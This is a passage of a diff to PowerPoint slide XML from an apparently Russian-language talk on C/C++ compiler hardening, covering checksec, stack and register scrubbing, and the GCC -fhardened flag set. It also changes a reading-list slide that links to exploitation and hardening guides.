-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527B94E6-AC75-496A-80B4-C52365ABC84D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Что стоит сделать </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861B54C4-30F2-41AC-AD28-53F5FBB73FC4}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверить дефолтные опции при сборке продуктового кода и дистрибутива</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Решить с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Security Team </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>какие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardening</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-методы включить</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Поиск проблемных программ (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>no-pie, etc.) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>можно автоматизировать с помощью </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>утилиты </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>checksec</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Может проверить наличие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>noexecstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, PIE, _FORTIFY_SOURCE, RELRO, etc.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(?) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не поддерживает более новые защиты</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: CFI (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>все виды</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>), Stack Clashing, Safe Stack, etc.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="Slide Number Placeholder 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD9F63E-EF6A-418A-B986-AFC03C54C97A}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldNum" sz="quarter" idx="12"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
-              <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>86</a:t>
-            </a:fld>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359780015"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -29890,7 +33825,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE0E5C5-D212-445A-B152-EE70980D9FFC}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FBBCCBC-F667-4231-85BA-0357462E7F40}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -29908,21 +33843,18 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Что почитать </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
-            </a:r>
+              <a:t>Другие опции</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947FFF96-69F7-4C4A-8AAB-7A04BDA9C83C}"/>
+          <p:cNvPr id="3" name="Text Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF1E393-523C-4524-B32D-C3F28EF2422D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -29930,7 +33862,7 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph idx="1"/>
+            <p:ph type="body" idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
@@ -29938,116 +33870,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Примеры атак</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Nightmare</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Overview of GLIBC heap exploitation techniques</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Руководства по </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardening</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>OpenSSF</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t> Compiler Options Hardening Guide for C and C++</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>Linux Hardening Guide</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Статьи </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>John </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Regehr</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>про </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>UB</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId6"/>
-              </a:rPr>
-              <a:t>A Guide to Undefined Behavior in C and C++</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId7"/>
-              </a:rPr>
-              <a:t>UB in 2017</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -30056,7 +33879,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F156ECC1-89ED-435D-9383-51CEED6C2D15}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF60EB6-4D51-481C-9223-8D6829AF904C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -30083,7 +33906,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3985882342"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1762390909"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -30115,7 +33938,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6713E613-45DE-4720-BCF2-4F99AC6FFAD0}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -30133,9 +33956,12 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Спасибо за внимание !</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Что дальше </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -30144,7 +33970,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6B1F09-94BF-48D9-B780-866C5F1B0092}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -30157,85 +33983,360 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Полная версия слайдов доступна по адресу</a:t>
+              <a:t>О некоторых опциях мы не успели поговорить</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Опции для очистки секретов (паролей, ключей</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, etc.):</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
             <a:pPr lvl="1"/>
             <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>S</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>tack scrubbing – очистка</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>стека при выходе из функции (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-fstrub</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Очистка регистров при выходе из функции </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-fzero-call-used-regs</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Опции для защиты от аппаратных атак </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Spectre</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, etc.)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fhardened</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>– зонтичная</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>опция для наиболее важных </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardened-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>оптимизаций</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включает все опции, рекомендованные </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>OpenSSF</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/RU.pptx</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
+              <a:t>Compiler Options Hardening Guide for C and C++</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Хороший дефолтный флаг, но пока реализован только в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>LLVM #122687</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Конкретный набор зависит от версии компилятора</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>можно посмотреть функцию </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>print_help_hardened</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Вопросы</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Сейчас</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>ftrivial</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-auto-var-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>init</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=zero -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fPIE</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -Wl,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>z,now</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -Wl,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>z,relro</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protector-strong -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-clash-protection -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fcf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protection=full</a:t>
             </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="5" name="Picture 4">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC4F7E3-DA50-4105-92F5-2DAFFC744B19}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:extLst>
-              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-              </a:ext>
-            </a:extLst>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4048685" y="2932580"/>
-            <a:ext cx="2857500" cy="2857500"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A51005D-9E17-47C5-BDBD-99FFE4265CB4}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F0C61A-D298-401E-8D62-8688B8F32571}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -30262,7 +34363,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2970358473"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -30294,7 +34395,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
